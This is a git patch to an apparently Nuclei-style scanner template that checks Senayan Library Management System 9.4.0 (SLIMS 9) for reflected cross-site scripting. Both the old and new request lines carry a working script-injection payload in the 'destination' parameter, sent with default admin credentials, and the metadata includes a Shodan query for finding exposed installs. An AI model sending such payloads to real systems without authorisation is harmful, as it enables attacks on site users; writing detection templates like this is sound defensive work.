From 9aa77a4e0924c2ef624cf1af49d0739847c04729 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 13:08:09 +0530 Subject: [PATCH] updated matchers --- vulnerabilities/other/slims-xss.yaml | 28 +++++++++++++++++----------- 1 file changed, 17 insertions(+), 11 deletions(-) diff --git a/vulnerabilities/other/slims-xss.yaml b/vulnerabilities/other/slims-xss.yaml index 9a73a9d2c3..1bb21de1fb 100644 --- a/vulnerabilities/other/slims-xss.yaml +++ b/vulnerabilities/other/slims-xss.yaml @@ -1,7 +1,7 @@ id: slims-xss info: - name: Senayan Library Management System v9.4.0 a.k.a SLIMS 9 - Access Control + name: Senayan Library Management System v9.4.0(SLIMS 9) - Cross Site Scripting author: arafatansari severity: medium description: | @@ -9,22 +9,28 @@ info: reference: - https://packetstormsecurity.com/files/170182/Senayan-Library-Management-System-9.4.0-Cross-Site-Scripting.html metadata: - shodan-query: http.html:"SLIMS" verified: "true" - tags: xss,slims + shodan-query: http.html:"SLIMS" + tags: xss,slims,senayan requests: - - raw: - - | - GET /index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(1)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member" matchers-condition: and matchers: + - type: word + words: + - '' + - 'SLiMS' + condition: and + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - ''